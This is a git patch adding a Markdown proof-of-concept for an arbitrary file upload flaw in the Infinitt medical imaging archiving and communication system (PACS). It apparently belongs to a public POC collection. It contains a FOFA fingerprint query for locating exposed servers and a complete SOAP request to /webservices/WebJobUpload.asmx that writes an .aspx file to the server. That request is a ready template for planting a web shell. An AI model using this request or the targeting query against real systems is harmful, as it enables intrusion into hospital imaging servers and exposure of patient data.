From 03c74901cc3b7527aeb340871edca5a794e4dbba Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 18 May 2024 19:26:33 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=8B=B1=E9=A3=9E=E8=BE=BE=E5=8C=BB?=
 =?UTF-8?q?=E5=AD=A6=E5=BD=B1=E5=83=8F=E5=AD=98=E6=A1=A3=E4=B8=8E=E9=80=9A?=
 =?UTF-8?q?=E4=BF=A1=E7=B3=BB=E7=BB=9FWebJobUpload=E4=BB=BB=E6=84=8F?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...�像存档与通信系统WebJobUpload任意文件上传漏洞.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md

diff --git a/英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md b/英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md
new file mode 100644
index 0000000..1a73e7d
--- /dev/null
+++ b/英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md
@@ -0,0 +1,35 @@
+## 英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞
+
+## fofa
+```
+icon_hash="1474455751" || icon_hash="702238928"
+```
+
+![26c19e0fd94f9ed212609cbb142a5efc](https://github.com/wy876/POC/assets/139549762/06bbb356-9749-45e7-80bf-868a611936cb)
+
+## poc
+```
+POST /webservices/WebJobUpload.asmx HTTP/1.1
+Host: 0.0.0.0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+Content-Length: 410
+Accept-Encoding: gzip, deflate
+Content-Type: text/xml; charset=utf-8
+Soapaction: "http://rainier/jobUpload"
+Connection: close
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<jobUpload xmlns="http://rainier">
+<vcode>1</vcode>
+<subFolder></subFolder>
+<fileName>test.aspx</fileName>
+<bufValue>dGVzdA==</bufValue>
+</jobUpload>
+</soap:Body>
+</soap:Envelope>
+```
+
+
+![ee4dcedec011b388f84d3086e9b84fbd](https://github.com/wy876/POC/assets/139549762/1396d267-c32e-4452-af68-a2a4a9ba45ad)